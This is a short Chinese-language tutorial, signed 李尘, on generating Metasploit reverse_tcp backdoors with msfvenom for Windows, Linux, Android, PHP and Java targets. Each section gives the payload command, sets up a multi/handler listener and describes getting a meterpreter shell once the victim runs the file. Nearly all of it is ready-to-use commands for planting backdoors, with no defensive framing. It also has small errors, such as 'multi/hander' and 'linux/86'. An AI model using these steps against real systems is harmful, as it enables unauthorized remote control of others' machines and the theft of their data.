操作系统

Windows

构造载荷

终端下输入命令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=本机IP LPORT=本地端口 -f filetype >filepath/filename

-p 值为构造的payload lhost 值为监听的ip lport 值为监听的端口 -f 值为生成的后门文件的类型 filepath 生成文件路径

将生成的文件复制到目标机中

在msfconsole设置监听

use exploit/multi/hander
进行相应配置

set payload windows/meterpreter/reverse_tcp set LHOST 本地IP set LPORT 本地端口 exploit

目标机执行文件

msfconsole成功获得一个会话进入meterpreter

成功连接后门

输入shell进入目标机shell


Linux

构造载荷

终端下输入命令
msfvenom -p linux/86/meterpreter/reverse_tcp LHOST=本机IP LPORT=本地端口 -f filetype >filepath/filename

-p 值为构造的payload lhost 值为监听的ip lport 值为监听的端口 -f 值为生成的后门文件的类型 filepath 生成文件路径 filename 生成文件名称

生成文件并赋予可执行的权限chmod 777 filename
将生成的文件复制到目标机中

msf开启监听

set payload linux/x86/meterpreter/reverse_tcp 及相应设置

目标机执行文件

msfconsole成功获得一个会话进入meterpreter

入侵成功

输入./filename 即可进入目标机shell


Android

构造载荷

终端下输入命令
msfvenom -p android/meterpreter/reverse_tcp LHOST=本机IP LPORT=本地端口 R >filepath/filename.apk

-p 值为构造的payload lhost 值为监听的ip lport 值为监听的端口 filepath 生成文件路径 filename 生成文件名称

msf开启监听

set payload android/meterpreter/reverse_tcp 及相应设置

目标机执行文件(可下载一个手机模拟器)

msfconsole成功获得一个会话进入meterpreter

入侵成功

键入check_root ,查看权限


编程语言

PHP

构造载荷

终端下输入命令
msfvenom -p php/meterpreter/reverse_tcp LHOST=本机IP LPORT=本地端口 -f raw >filepath/filename.php

-p 值为构造的payload lhost 值为监听的ip lport 值为监听的端口 filepath 生成文件路径 filename 生成文件名称

将生成的文件复制到目标机中

msf开启监听

set payload php/meterpreter/reverse_tcp 及相应设置

目标机执行文件

  • windows下,需要搭建PHP环境,以浏览器方式打开
  • kali Linux 开启apache2服务下
    • 输入php ./filename.php命令执行文件
    • 搭建服务器,将文件放到根目录,以浏览器方式打开

msfconsole成功获得一个会话进入meterpreter

入侵成功

键入shell即可进入目标机shell


Java

构造载荷

终端下输入命令
msfvenom -p java/meterpreter/reverse_tcp LHOST=本机IP LPORT=本地端口 -o filepath/filename.jar

-p 值为构造的payload lhost 值为监听的ip lport 值为监听的端口 filepath 生成文件路径 filename 生成文件名称

将生成的文件复制到目标机中

msf开启监听

set payload java/meterpreter/reverse_tcp 及相应设置

目标机执行文件

  • windows下,java环境安装的前提下,双击打开
  • kali Linux java -jar ./filename.jar

msfconsole成功获得一个会话进入meterpreter

入侵成功

键入shell即可进入目标机shell

作者:李尘